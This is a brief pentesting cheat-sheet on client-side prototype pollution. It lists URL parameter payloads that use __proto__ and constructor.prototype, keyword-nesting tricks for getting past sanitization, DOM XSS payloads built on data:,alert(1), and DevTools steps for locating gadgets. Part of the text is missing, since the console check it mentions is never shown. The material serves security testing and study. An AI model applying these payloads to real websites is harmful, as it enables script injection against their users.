Prototype Pollution in Client-Side
Prototype Pollution is a JavaScript vulnerability that allows attackers to add arbitrary prooperties to global object prototypes. The vulnerability may exist in Node.js applications.
- [client-side](https://portswigger.net/web-security/prototype-pollution/client-side)
- [client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution)
Investigation
Check if we can assign arbitrary property via URL.
Try various ways.
https://example.com/?__proto__[foo]=bar
https://example.com/?__proto__.foo=bar
https://example.com/?constructor.[prototype][foo]=bar
https://example.com/?constructor.prototype.foo=bar
# Bypass sanitization
https://example.com/?__pro__proto__to__[foo]=bar
https://example.com/?__pro__proto__to__.foo=bar
https://example.com/?constconstructorructor[prototype][foo]=bar
https://example.com/?constconstructorructor.prototype.foo=bar
https://example.com/?constconstructorructor[protoprototypetype][foo]=bar
https://example.com/?constconstructorructor.protoprototypetype.foo=bar
Open browser console, and type the following to check if our above property is assigned.
DOM XSS
If our payload affects an HTML element after loading, we can inject DOM-based XSS as below.
Assume the key name of the property is "source_url", whose value is loaded as "src" in a script
element. What property name is defined might be found by investigating JavaScript code assigned in the website.
https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=alert(1)-
Finding Gadgets
- In browser, open DevTools and click the Sources (Chrome) or the Debugger (FireFox) tab, then find the JavaScript code which is affected by our pollution.
- When found the line of the code, click the line number at the left of the line to add a breakpoint. Then reload the page.
- The line that added as a breakpoint is highlighted. We can hover the target property to check the current value assigned.
- Adjust for executing our payload while checking the property's value.